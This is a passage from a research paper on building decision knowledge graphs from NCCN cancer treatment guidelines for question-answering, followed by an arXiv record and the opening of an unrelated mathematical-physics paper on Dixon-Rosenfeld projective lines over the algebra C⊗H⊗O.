main modules as shown in Figure 2: PDF Parser, Constraint Extractor, and DKG builder. #### 6.2.1 PDF Parser Input to the PDF parser is the CPG PDF file. The PDF Parser recognizes the text in text boxes in the CPGs using optical character recognition (OCR). Superscripts and subscripts on text, as described in Section 4, are replaced with the text given in the footnotes. Hypertexts, described in Section 4, in the text boxes, are replaced with the content that it is pointing to. The output of the PDF parser is a CSV file with two columns: the first column corresponds to the head entity (text present in the box of the arrow tail), and the second column corresponds to the tail entity (text present in the box of the arrowhead). #### 6.2.2 Constraint Extraction The constraint extractor iterates over each sentence in the CSV file generated above. On each input sentence, it outputs the constraints (refer to Section 3.1 for definition) in the sentence. If there are no constraints in a sentence, NULL is returned. If there are multiple constraints, they are returned separated by a comma (,). The Constraint extractor is a hybrid (rule-based and deep learning-based) model which uses the output of a constituency parser. In constraint extractor, the input sentence is first pre-processed, and the pre-processed sentence is tokenized and passed to the constituency parser. The output of the constituency parser is a tree-based structure (refer Appendix A for more details). The tree nodes are merged recursively with regular expression rules for linking the entities which are close to each other. Stop words and verbs are removed from the sentence and mathematical words are replaced by their symbol. This final output is given to a keyword-based extractor to get constraints. The output of the constraint extractor is stored in the constraint column in the CSV file along with the sentence. #### 6.2.3 DKG Builder The above generated CSV file has four columns: Head entity, Head Constraints, Tail entity, and Tail Constraints. These will be used to build the DKG. The head entity is a sentence, present as data in the head node and head constraints are the patients' constraints, separated by a comma (,). Similarly, tail entity and tail constraints are tail node data and patients' constraints. The head entity and the tail entity will be stored as static data, and the head and tail constraints as dynamic data. We have used the neo4j graph database (licensed and distributed under GPL v3) to store this knowledge graph. Loading the CSV file to neo4j can be done using _"LOAD CSV FROM <path_to_csv>"_ command. As the neo4j graph database allows multiple property-value pairs in a single node, we have stored static data with property name "content" and constraints with property name depending on the type of constraint as shown in Figure 2. ### Searching in Decision Knowledge Graph We have used Cypher Query Language (CQL) to query DKG. CQL is like Structured Query Language (SQL). SQL is used to query famous database management systems like PostgreSQL, MySQL, etc., while CQL is used to query the neo4j graph database. The syntax used by CQL is of the ASCII-art variety, with _(nodes)-[: ARE_CONNECTED_TO] >_(otherNodes)_ employing rounded brackets for circular _(nodes)_ and _-[: ARROWS]->_ for relationships. It creates a graph pattern over the data when we write a query. We can use _MATCH_ query to search the DKG. If we want to know the next treatment step for a patient who is _ph+ ALL_ and Minimal Residual Disease (MRD) is _rising_, then the corresponding CQL query will be: _MATCH (m: node-stratified='ph+', MRD:'rising')-[:next_step]->_n RETURN n.treatments_. Here, \(m\) and \(n\) are node variables. ### Operations on Decision Knowledge Graph We can perform the following operations on a DKG: deleting a constraint, inserting a new constraint, and updating a constraint. Deleting a constraint can be done using the command _"MATCH node REMOVE constraint"_. Inserting a constraint can be done using the command _"MATCH node SET constraint"_. Updating can be done by deletion followed by insertion. The time taken for performing the above operations is search time taken by _MATCH_ operation, which is _O(nodes)_ (linear), as _SET_ and _REMOVE_ operation takes _O(1)_ (constant) time. ### Constructed DKG Information The DKG is generated for three types of cancers, ALL, Bone, and Kidney. Table 1 shows the information on the number of nodes and relations in these DKGs. ## 7 Question-Answering on Clinical Practice Guidelines (CPGs) In this section, we discuss the models used to perform question-answering. ### Word Embeddings BioBERT from Lee et al. (2020) is a pre-trained biological language representation model based on the BERT from Devlin et al. (2018) (Bidirectional Encoder Representations from Transformers) architecture, which is a natural language processing neural network model. BioBert is pre-trained on a huge corpus of biomedical texts, such as PubMed, making it especially well-suited for biomedical text mining and related applications. It is pre-trained to capture the nuances of biomedical language and terminology, and has shown state-of-the-art performance on various biomedical tasks. As BioBERT has missing embeddings for words used in NCCN guidelines. We have created new embeddings us \begin{table} \begin{tabular}{|c|c|c|c|} \hline **Cancer type** & **Total** & **Decision** & **Relations** \\ \hline **ALL** & 58 & 20 & 74 \\ **Bone** & 191 & 72 & 243 \\ **Kidney** & 50 & 16 & 61 \\ **Total** & 299 & 108 & 378 \\ \hline \end{tabular} \end{table} Table 1: Results showing number of nodes and relations in DKG. \(1^{st}\) col specifies the cancer type, \(2^{nd}\) col specifies total number of nodes in the DKG structure, \(3^{rd}\) col specifies total number of decision nodes, and \(4^{th}\) col specifies total number of relations in the DKG structure. Figure 2: DKG Construction; i) PDF Parser: converts PDF of NCCN guidelines to CSV file, ii) Constraint Extractor: extracts the constraints (refer to Section 3.1 for definition) from each sentence and adds them to CSV file, iii) DKG Builder: takes the CSV and builds the DKG in neo4j graph database ing the architecture shown in Figure 4. We have used MeSH RDF dataset for domain knowledge i.e., we have checked whether the subword from NCCN guidelines is present in MeSH data or not. If the subword is not present, we have avoided training with the particular subword. Datasets of NCCN guidelines and MIMIC III are augmented for training. Subword embedding model from fast-text (MIT License) is used for training. Embedding correctness is checked using analogy task. ### Question-Answering without DKG Figure 5 shows the architecture of the model. A transformer is used to perform question-answering (QA) task. Here, the model takes a question (natural language question specifying the conditions of the patient) and generates an answer (recommended next treatment procedure). We split the data into 70% train, 15% validation and 15% testing. The model consists of 19 million parameters with 8 heads, 256 latent dimension. Figure 4: Model to generate embeddings for missing words and improve existing embeddings from NCCN guidelines Figure 5: Question Answering without DKG; transformer model trained on question and answers from the guidelines Figure 3: Question Answering using DKG; i) Query Building Module builds the cypher query from given natural language (NL) question, ii) Neo4j Graph Database fetches the node from the DKG according to the query and returns the content of the node ### Question-Answering with DKG Figure 3 shows the architecture of the proposed model. As we have seen in Section 6.3, we need CQL to query DKG. Given a natural language question from the user, using a transformer model, we convert the question to CQL query. We have used the dataset that is created in Section 5 to train the model. We have post-processed the generated query based on the syntax of CQL. The post-processed query's parameters are verified from the question. This generated CQL query is used to retrieve data from the neo4j database. Neo4j database retrieves the matched node corresponding to the CQL query from the DKG which is the answer to the natural language question. We split the data into 70% train, 15% validation and 15% testing. The model consists of 19 million parameters with 8 heads, 256 latent dimension. ## 8 Results and Analysis Table 2 shows the results on both question-answering models, with and without DKG. Having DKG has improved accuracy (calculated as number of correct matches divided by total number of questions) by 40% compared to the deep learning model. The model with DKG has outperformed in every metric. This shows that having the knowledge of guidelines will help in getting better results. The model with DKG is performing better compared to the model without DKG. Some of the reasons of this improvement is dataset size as transformer is data hungry we need a large amount of data to make transformer perform well, and unavailability of domain knowledge in the model without DKG. * **Question:** _A 68-year-old ph-ALL patient without any significant comorbidities underwent a clinical trial during the treatment induction phase, achieving a CR response assessment. He was monitored with persistent rising MRD. What procedures are recommended?_ * **Actual Answer:** _Blinatumomab followed by Allogenic HCT_ * **Predicted Answer (without DKG):** _Predicted Answer: Allogenic HCT (especially if high-risk features or consider continuing multiagent chemotherapy or Blinatumomab_ * **Predicted cypher query:** _MATCH (m: decision_node stratified='ph-', MRD:'rising')-[:next_step]-> n RETURN n.treatments_ * **Predicted Answer (with DKG):** _Blinatumomab follwed by Allogenic HCT_ ## 9 Conclusion and Future Work In conclusion, representing clinical practice guidelines (CPGs) digitally is challenging. The proposed novel structure, Decision Knowledge Graph (DKG) can effectively store CPGs. DKG enables the encoding of decision-based structures, which are often changed in CPGs, in addition to factual data. Our work makes a significant addition to the field of representing medical knowledge and can help practitioners and doctors to make well-informed judgments about patient's treatment. Our work also contributes to the NLP community by providing a representation for storage of knowledge which has decision-based structure. The model is intended to be used by professional practitioners and doctors only and for recommendation purpose, not to solely depend on the models recommended treatment. The DKG is constructed only for NCCN guidelines in this paper. But this structure can be used for other guidelines data. The structure is not restricted to medical domain but can also be expanded to other domains like construction guidelines in Civil engineering, etc. ## Limitations The model can suggest recommended treatment procedures for ALL cancer type based on NCCN guidelines version 1.2022 of ALL cancer. This \begin{table} \begin{tabular}{|c|c|c|} \hline **Metric** & **Without DKG** & **With DKG** \\ \hline ROUGE precision & 0.49 & 0.95 \\ ROUGE recall & 0.62 & 0.96 \\ ROUGE f-measure & 0.51 & 0.96 \\ BLEU & 0.44 & 0.95 \\ Jaccard & 0.46 & 0.92 \\ Accuracy & 0.259 & **0.676** \\ \hline \end{tabular} \end{table} Table 2: Results on QA with DKG and without DKG; \(1^{st}\) col corresponds to various metrics; the baseline model (the \(2^{nd}\) col) is a fine-tuned Bio-Bert model as described in Figure 5; the proposed model (the \(3^{rd}\) col) is a transformer model with Decision Knowledge Graph (DKG) support as described in Figure 3, Metric definitions can be referred from Appendix C recommended treatment still needs the involvement of doctor. It does not replace the work done by doctor, instead helps him in making things faster. The work done is limited to CPGs, and data having decision based behaviour. DKG is not useful to store he data which don't have this behavior.
2303.11334
Dixon-Rosenfeld Lines and the Standard Model
We present three new coset manifolds named Dixon-Rosenfeld lines that are similar to Rosenfeld projective lines except over the Dixon algebra $\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}$. Three different Lie groups are found as isometry groups of these coset manifolds using Tits' formula. We demonstrate how Standard Model interactions with the Dixon algebra in recent work from Furey and Hughes can be uplifted to tensor products of division algebras and Jordan algebras for a single generation of fermions. The Freudenthal-Tits construction clarifies how the three Dixon-Rosenfeld projective lines are contained within $\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})$, $\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})$, and $\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})$.
David Chester, Alessio Marrani, Daniele Corradetti, Raymond Aschheim, Klee Irwin
2023-03-18T01:11:31Z
http://arxiv.org/abs/2303.11334v2
# Dixon-Rosenfeld Lines and the Standard Model ###### Abstract We present three new coset manifolds named Dixon-Rosenfeld lines that are similar to Rosenfeld projective lines except over the Dixon algebra \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Three different Lie groups are found as isometry groups of these coset manifolds using Tits' formula. We demonstrate how Standard Model interactions with the Dixon algebra in recent work from Furey and Hughes can be uplifted to tensor products of division algebras and Jordan algebras for a single generation of fermions. The Freudenthal-Tits construction clarifies how the three Dixon-Rosenfeld projective lines are contained within \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\), and \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). ###### Contents * I Introduction and Motivation * II.1 Tensor products on unital composition algebras * II.2 The Dixon algebra * II Dixon-Rosenfeld lines * II.1 Dixon lines as coset manifold * II.2 Tits' magic formula * II.3 Three isometry groups * II.4 Three Dixon lines * III Relationship with octonionic Rosenfeld lines * IV Projective lines over \(\mathbb{C}\otimes\mathbb{H}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) * IV.1 Generalized minimal left ideals of \(\mathbb{C}\otimes\mathbb{H}\) * IV.2 Generalized minimal left ideals of \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) * V Projective lines over \(\mathbb{C}\otimes\mathbb{O}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{O})\) * V.1 Minimal left ideals of \(\underline{Cl(6)}\) via chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\) * V.2 Uplift of \(\mathbb{Cl}(6)\) in \(\mathbb{C}\otimes\overline{J_{2}(\mathbb{O})}\) * VI Projective lines over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) * VI.1 One generation from \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) * VI.2 Uplift to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) * VI.3 Uplift to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) * VI.4 Uplift to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) * VII Conclusions * VIII Acknowledgments Introduction and motivation We focus on the definition of three coset manifolds of dimension 64 that we call _Dixon-Rosenfeld lines_. Each contains an isometry group whose Lie algebra is obtained from Tits' magic formula. These three constructions are obtained similarly to how projective lines are obtained over \(\mathbb{R},\mathbb{C},\mathbb{H}\) and \(\mathbb{O}\); therefore, they can be thought of as "generalized" projective lines over the Dixon algebra \(\mathbb{T}\equiv\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) in the sense presented by Rosenfeld in [11, 12, 13]. The division algebras have been used for a wide variety of applications in physics [14, 15, 16, 17, 18]. In 1973, Gursey and Gunaydin discussed the relationship of octonions to QCD, since \(SU(3)\) is a maximal subgroup of automorphisms over the octonions \(\operatorname{Aut}(\mathbb{O})=G_{2}\)[15, 16, 17]. Later, Dixon introduced the algebra \(\mathbb{T}\equiv\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) for a single generation of fermions in the Standard Model [19, 20, 21, 22]. This line of investigation was revived when Furey further explored the Standard Model with the Dixon algebra [23, 24, 25, 26, 27, 28, 29] and Castro introduced gravitational models involving the Dixon algebra [20, 21, 22]. Recently, Furey and Hughes focused on Weyl spinors for one generation of the Standard Model fermions with \(\mathbb{T}\)[23, 24]. Our work on Dixon-Rosenfeld lines defines three homogeneous spaces that locally embed a representation of \(\mathbb{T}\) to encode one generation of fermions in the Standard Model. Section (II) shows that three coset manifolds of real dimension 64 are possible, giving three non-simple Lie algebras as isometry groups that are obtained from Tits formula. Section (III) analyzes the relationship between the new Dixon-Rosenfeld lines with the Rosenfeld lines. Section (IV) uplifts scalar, spinor, vector, and 2-form representations of the Lorentz group representations with \(\mathbb{C}\otimes\mathbb{H}\) from Furey [23] to \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). Section (V) uplifts the Standard Model fermionic charge sector described by Furey with \(\mathbb{C}\otimes\mathbb{O}\)[23] to \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). Section (VI) uplifts recent work by Furey and Hughes for encoding Standard Model interactions with \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\)[24] to the three different realizations of the Dixon-Rosenfeld lines via \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\), and \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). Section (VII) concludes with a summary of our work and outlines prospects for future work. ### Tensor products on unital composition algebras An _algebra_ is a vector space \(X\) with a bilinear multiplication. Different properties of the multiplication give rise to numerous kind of algebras. Indeed, for what it will be used in the following sections, an algebra \(X\) is said to be _commutative_ if \(xy=yx\) for every \(x,y\in X\); is _associative_ if satisfies \(x\left(yz\right)=\left(xy\right)z\); is _alternative_ if \(x\left(yx\right)=\left(xy\right)x\); _flexible_ if \(x\left(yy\right)=\left(xy\right)y\) and, finally, _power-associative_ if \(x\left(xx\right)=\left(xx\right)x\).[14] It is worth noting that the last four proprieties are progressive and proper refinements of associativity, i.e. \[\text{associative}\Rightarrow\text{alternative}\Rightarrow\text{flexible} \Rightarrow\text{power-associative}.\] Every algebra has a zero element \(0\in X\), since \(X\) has to be a group in respect to the sum, but if it also does not have zero divisors, then \(X\) is called a _division_ algebra, i.e. if \(xy=0\) then or \(x=0\) or \(y=0\). While the zero element is always present in any algebra, if it exists an element \(1\in X\) such that \(1x=x1=x\) for all \(x\in X\) then the algebra is _unital_. Finally, if we can define over \(X\) an involution, called _conjugation_, and a quadratic form \(N\), called _norm_, such that \[N\left(x\right) =x\overline{x}, \tag{1}\] \[N\left(xy\right) =N\left(x\right)N\left(y\right), \tag{2}\] with \(x,y\in X\) and \(\overline{x}\) as the conjugate of \(x\), then the algebra is called a _composition_ algebra. A well-known theorem due to Hurwitz [30] states that \(\mathbb{R}\), \(\mathbb{C}\), \(\mathbb{H}\) and \(\mathbb{O}\) are the only four normed division algebras that are also unital and composition [13, 20]. More specifically, \(\mathbb{R}\) is also totally ordered, commutative and associative; \(\mathbb{C}\) is just commutative and associative; \(\mathbb{H}\) is only associative and, finally, \(\mathbb{O}\) is only alternative, as summarized in Table (1). Since all four normed division algebras are vector spaces over the field of reals \(\mathbb{R}\) we are able to define a tensor product \(\mathbb{A}\otimes\mathbb{B}\) of two normed division algebras, with a bilinear product defined by \[\left(a\otimes b\right)\left(c\otimes d\right)=ac\otimes bd, \tag{3}\] where \(a,c\in\mathbb{A}\) and \(b,d\in\mathbb{B}\). The resulting tensor products are well known tensor algebras called \(\mathbb{C}\otimes\mathbb{C}\)_Bicomplex_, \(\mathbb{C}\otimes\mathbb{H}\)_Biquaternions_, \(\mathbb{H}\otimes\mathbb{O}\)_Quaterquaternions_, \(\mathbb{C}\otimes\mathbb{O}\)_Bicotenions_, \(\mathbb{H}\otimes\mathbb{O}\)_Quateroctonions_ and \(\mathbb{O}\otimes\mathbb{O}\)_Octooctonions_. By the definition of the product, it is clear that all algebras involving the Octonions are not associative. Moreover, while Bioctonions \(\mathbb{C}\otimes\mathbb{O}\) is an alternative algebra, Quateroctonions \(\mathbb{H}\otimes\mathbb{O}\) and Octooctonions \(\mathbb{O}\otimes\mathbb{O}\) are not alternative nor power-associative. Every alternative algebra tensor a commutative algebra yields again to an alternative algebra, so that with few additional efforts we can easily find all properties fo triple tensor products listed in Table (2). ### The Dixon algebra The _Dixon Algebra_\(\mathbb{T}\) is the \(\mathbb{R}\)-linear tensor product of the four normed division algebras, i.e. \(\mathbb{R}\otimes\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) or equivalently \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\), with linear product defined by \[\left(z\otimes q\otimes w\right)\left(z^{\prime}\otimes q^{\prime}\otimes w^{ \prime}\right)=zz^{\prime}\otimes qq^{\prime}\otimes ww^{\prime}, \tag{4}\] with \(z,z^{\prime}\in\mathbb{C}\), \(q,q^{\prime}\in\mathbb{H}\) and \(w,w^{\prime}\in\mathbb{O}\). From the previous formula it is evident that \(\mathbb{T}\) is unital with unit element \(\mathbf{1}=1\otimes 1\otimes 1.\) As a real vector space, the Dixon Algebra has an \(\mathbb{R}^{64}\) decomposition for which every element \(t\) is of the form \[t= \sum_{\alpha=0}^{63}\,t^{\alpha}\,\,\,z\otimes q\otimes w, \tag{5}\] where \(t^{\alpha}\in\mathbb{R}\), and \(z,q,w\) are elements of a basis for \(\mathbb{C}\), \(\mathbb{H}\), \(\mathbb{O}\) respectively, i.e. \(z\in\{1,I\}\), \(q\in\{1,i,j,k\}\) and \(w\in\{1,e_{1},...,e_{7}\}\) with \[I^{2} =i^{2}=j^{2}=k^{2}=e_{\alpha}^{2}=-1, \tag{6}\] \[\left[I\,,i\right] =\left[I\,,j\right]=\left[I\,,k\right]=\left[I\,,e_{\alpha}\right] =0,\] (7) \[\left[e_{\alpha},i\right] =\left[e_{\alpha},j\right]=\left[e_{\alpha},k\right]=0, \tag{8}\] and the other rules of multiplication given in Fig. (1). \begin{table} \begin{tabular}{|c|c|c|c|c|c|} \hline Algebra & Comm. & Ass. & Alter. & Flex. & Pow. Ass. \\ \hline \hline \(\mathbb{C}\otimes\mathbb{C}\) & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{H}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{O}\) & No & No & Yes & Yes & Yes \\ \hline \(\mathbb{H}\otimes\mathbb{O}\) & No & No & No & No & No \\ \hline \(\mathbb{C}\otimes\mathbb{C}\otimes\mathbb{C}\) & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{C}\otimes\mathbb{H}\) & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{H}\otimes\mathbb{H}\otimes\mathbb{H}\) & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\otimes\mathbb{C}\otimes\mathbb{O}\) & No & No & No & No & No \\ \hline \end{tabular} \end{table} Table 2: Commutativity, associativity, alternativity, flexibility and power associativity of two and three tensor products of normed division algebras \(\mathbb{R}\), \(\mathbb{C}\), \(\mathbb{H}\) and \(\mathbb{O}\) are shown. The split version of the algebras obeys the same property of the division version. \begin{table} \begin{tabular}{|c|c|c|c|c|c|c|} \hline Algebra & Ord. & Comm. & Ass. & Alter. & Flex. & Pow. Ass. \\ \hline \hline \(\mathbb{R}\) & Yes & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{C}\) & No & Yes & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{H}\) & No & No & Yes & Yes & Yes & Yes \\ \hline \(\mathbb{O}\) & No & No & No & Yes & Yes & Yes \\ \hline \end{tabular} \end{table} Table 1: Ordinality, commutativity, associativity, alternativity, flexibility, and power associativity are summarized for the division algebras. It is straightforward to see that every element in the set \[D=\left\{\left(I\,q\pm 1\right),\left(I\,e_{\alpha}\pm 1\right),\ \left(gc_{\alpha}\pm 1 \right):q\in\left\{i,j,k\right\}\right\}, \tag{9}\] is a _zero divisor_ and therefore \(\mathbb{T}\) is not a division algebra. Moreover, the Dixon algebra is not commutative, neither associative, nor alternative or flexible and, finally, not even power-associative, i.e. in general \(x\left(xx\right)\neq\left(xx\right)x\). Nevertheless, it is possible to define a a quadratic norm \(N\) over \(\mathbb{T}\), starting from the decomposition in Eq. (5), i.e. \[N\left(t\right)=\!\!\sum_{\alpha=0}^{63}\left(t^{\alpha}\right)^{2}, \tag{10}\] with an associated _polar form_\(\left\langle\cdot,\cdot\right\rangle\) given by the symmetric bilinear form \[2\left\langle t_{1},t_{2}\right\rangle=N\left(t_{1}+t_{2}\right)-N\left(t_{1} \right)-N\left(t_{2}\right). \tag{11}\] ## II Dixon-Rosenfeld lines The geometrical motivation for defining Dixon-Rosenfeld lines as coset manifolds relies on the study of the octonionic planes explored by Tits, Freudenthal and Rosenfeld in a series of seminal works [11, 12, 13, 14] that led to a geometric interpretation of Lie algebras and to the construction of the Tits-Freudenthal Magic Square. While Freudenthal interpreted the entries of the Magic Square as different forms of automorphisms of the projective plane such as isometries, collineations, homography etc., Rosenfeld thought of every row of the magic square as the Lie algebra of the isometry groups of a "generalized" projective plane over a tensorial product of Hurwitz algebras [14] (see also [MCCAI] for a recent systematic review). In fact, tensor products over Hurwitz algebras are not division algebras, which therefore do not allow the definition of a projective plane in a strict sense. Nevertheless, later works of Atsuyama proved the insight of Rosenfeld to be correct and that it is possible to use these algebras to define projective planes in a "wider sense" [15, 16]. A similar analisys was then carried out for generalized projective lines making use the Tits-Freudenthal Magic Square of order two instead of three, thus relating the resulting Lie algebras with isometries of generalized projective lines, instead of planes (see [12], for more details). ### Dixon lines as coset manifold _Coset manifolds_ arise from coset spaces over a Lie group \(G\) given by an equivalence relation of the type \[g\sim g^{\prime}\Longleftrightarrow gh=g^{\prime}, \tag{12}\] where \(g,g^{\prime}\in G\) and \(h\in H\) and \(H\) is a closed subgroup of \(G\). In this case, the coset space \(G/H\), obtained from the equivalence classes \(gH\), inherits a manifold structure from \(G\) and is therefore a manifold of dimension \[\dim\left(G/H\right)=\dim\left(G\right)-\dim\left(H\right). \tag{13}\] Moreover, \(G/H\) can be endowed with invariant metrics such that all elements of the original group \(G\) are isometries of the constructed metric [17, MCCAI]. More specifically, the structure constants of the Lie algebra \(\mathfrak{g}\) of the Lie group \(G\) define completely the metric and therefore all the metric-dependent tensors, such as the curvature tensor, the Ricci tensor, etc. Finally, the coset space \(G/H\) is a homogeneous manifold by construction, i.e. the group \(G\) acts transitively, and its _isotropy subgroup_ is precisely \(H\), i.e. the group \(H\) is such that for any given point \(p\) in the manifold \(hp=p\). Therefore, for our purposes in the definition of the Dixon-Rosenfeld lines, it will be sufficient to define the isometry group and the isotropy group of the coset manifold to have them completely defined in its topological and metrical descriptions. ### Tits' magic formula We now proceed defining three Dixon projective lines as three different coset spaces of real dimension \(64\) obtained from three isometry algebras \(\mathfrak{a}_{I}\), \(\mathfrak{a}_{II}\) and \(\mathfrak{a}_{III}\) making the use of Tits' magic formula for \(n=2\), i.e. \[\mathcal{L}_{2}\left(\mathbb{A},\mathbb{B}\right)=\mathfrak{ acr}\left(\mathbb{A}\right)\oplus\mathfrak{acr}\left(\mathfrak{J}_{2} \left(\mathbb{B}\right)\right)\oplus\left(\mathbb{A}^{\prime}\otimes \mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\right), \tag{14}\] where \(\mathbb{A},\mathbb{B}\) are alternative algebras and \(\mathfrak{J}_{2}\left(\mathbb{B}\right)\) is a Jordan algebra over Hermitian two by two matrices [Ti]. Brackets on \(\mathcal{L}_{2}\left(\mathbb{A},\mathbb{B}\right)\) can be defined following notation in [2, sec. 3] for which, given the an algebra \(\mathbb{A}\), we define \[X^{\prime}=X-\frac{1}{2}\mathrm{Tr}\left(X\right)\mathbf{1}, \tag{15}\] as the projection of an element of the algebra in the subspace orthogonal to the identity denoted as \(\mathbf{1}\). We then define \(\mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\) the algebra obtained by such elements with the product \(\bullet\) given by the projection back on the subspace orthogonal to the identity of the Jordan product, i.e. \[X^{\prime}\bullet Y^{\prime}=X^{\prime}\cdot Y^{\prime}-2\left\langle X^{ \prime},Y^{\prime}\right\rangle\mathbf{1}, \tag{16}\] where, as usual we intended \(X\cdot Y=XY+YX\) and \(\left\langle X,Y\right\rangle=\nicefrac{{1}}{{2}}\mathrm{Tr}\left(X\cdot Y\right)\) for every \(X,Y\in\mathfrak{J}_{2}\left(\mathbb{B}\right)\). With this notation, the vector space \[\mathcal{L}_{2}\left(\mathbb{A},\mathbb{B}\right)=\mathfrak{ acr}\left(\mathbb{A}\right)\oplus\mathfrak{ acr}\left(\mathfrak{J}_{2}\left(\mathbb{B}\right)\right)\oplus\left(\mathbb{A}^{ \prime}\otimes\mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\right), \tag{17}\] is endowed with the following brackets 1. The usual brackets on the Lie subalgebra \(\mathfrak{acr}\left(\mathbb{A}\right)\oplus\mathfrak{acr}\left(\mathfrak{J}_ {2}\left(\mathbb{B}\right)\right)\). 2. When \(a\in\mathfrak{acr}\left(\mathbb{A}\right)\oplus\mathfrak{acr}\left(\mathfrak{ J}_{2}\left(\mathbb{B}\right)\right)\) and \(A\in\mathbb{A}^{\prime}\otimes\mathfrak{J}_{2}^{\prime}\left(\mathbb{B}\right)\) then \[\left[a,A\right]=a\left(A\right).\] (18) 3. When \(a\otimes A,b\otimes B\in\mathbb{A}^{\prime}\otimes\mathfrak{J}_{2}^{\prime} \left(\mathbb{B}\right)\) then \[\left[a\otimes A,b\otimes B\right]=\frac{1}{2}\left\langle A,B\right\rangle D_ {a,b}-\left\langle a,b\right\rangle\left[L_{A},L_{B}\right]+\frac{1}{2}\left[a, b\right]\otimes\left(A\bullet B\right),\] (19) where \(L_{x}\) and \(R_{x}\) are the left and right action on the algebra and \(D_{x,y}\) is given by \[D_{x,y}=\left[L_{x},L_{y}\right]+\left[L_{x},R_{y}\right]+\left[R_{x},R_{y} \right].\] (20) ### Three isometry groups Tits' formula is the most general formula compared to those of Vinberg [18], Atsuyama [Ats], Santander and Herranz [SH], Barton and Sudbury [2], and Elduque [1] since it does not require the use of two composition algebras, but only the use of an alternative algebra and a Jordan algebra obtained from another alternative algebra. By the associativity and commutativity of the tensor product, we now consider all possible product of the form \(\mathbb{A}\otimes\mathbb{B}\) that yield to the Dixon algebra \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) requiring alternativity on \(\mathbb{A}\) and \(\mathbb{B}\). Since \(\mathbb{H}\otimes\mathbb{O}\) is not alternative, the possible candidates can be _a priori_ only related with the following four different \(\mathbb{A}\) and \(\mathbb{B}\), i.e. \[I:\mathbb{A} =\left(\mathbb{C}\otimes\mathbb{H}\right),\mathbb{B}=\mathbb{O}, \tag{21}\] \[II:\mathbb{A} =\mathbb{O},\mathbb{B}=\left(\mathbb{C}\otimes\mathbb{H}\right),\] (22) \[III:\mathbb{A} =\left(\mathbb{C}\otimes\mathbb{O}\right),\mathbb{B}=\mathbb{H}, \tag{23}\] and, finally, \(\mathbb{A}=\mathbb{H},\mathbb{B}=\left(\mathbb{C}\otimes\mathbb{O}\right).\) However the latter case, i.e. \(\mathbb{A}=\mathbb{H},\mathbb{B}=\left(\mathbb{C}\otimes\mathbb{O}\right)\), would need the existence of a Jordan algebra \(\mathfrak{J}_{2}\left(\mathbb{C}\otimes\mathbb{O}\right)\) over Biotonions \(\mathbb{C}\otimes\mathbb{O}\), which is not possible if we want to consider real elements as symmetric part of the involution, i.e. real coefficients on the diagonal.[81] We are therefore left with only three different possibilities, i.e. \[\mathfrak{a}_{I} =\mathcal{L}_{2}\left(\mathbb{C}\otimes\mathbb{H},\mathbb{O} \right),\] \[\mathfrak{a}_{II} =\mathcal{L}_{2}\left(\mathbb{O},\mathbb{C}\otimes\mathbb{H} \right), \tag{24}\] \[\mathfrak{a}_{III} =\mathcal{L}_{2}\left(\mathbb{C}\otimes\mathbb{O},\mathbb{H} \right).\] 1. In the case \(\mathbb{A}=\mathbb{C}\otimes\mathbb{H}\) and \(\mathbb{B}=\mathbb{O}\), the vector space is given by where \(\left(\mathbb{C}\otimes\mathbb{H}\right)^{\prime}\otimes\mathfrak{J}_{2}^{ \prime}\left(\mathbb{O}\right)\) can be intended as the representation \(\left(\mathbf{7},\mathbf{9}\right)\) of \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\). The Lie algebra \(\mathfrak{a}_{I}\) has therefore real dimension \(3+36+63=102\). 2. In the case \(\mathbb{A}=\mathbb{O}\) and \(\mathbb{B}=\mathbb{C}\otimes\mathbb{H}\), we have the real vector space where \(\mathbb{O}^{\prime}\otimes\mathfrak{J}_{2}^{\prime}(\mathbb{C}\otimes\mathbb{ H})\) can be intended as the \(\left(\mathbf{7},\mathbf{2}\cdot\mathbf{7}+\mathbf{1}\right)\) of 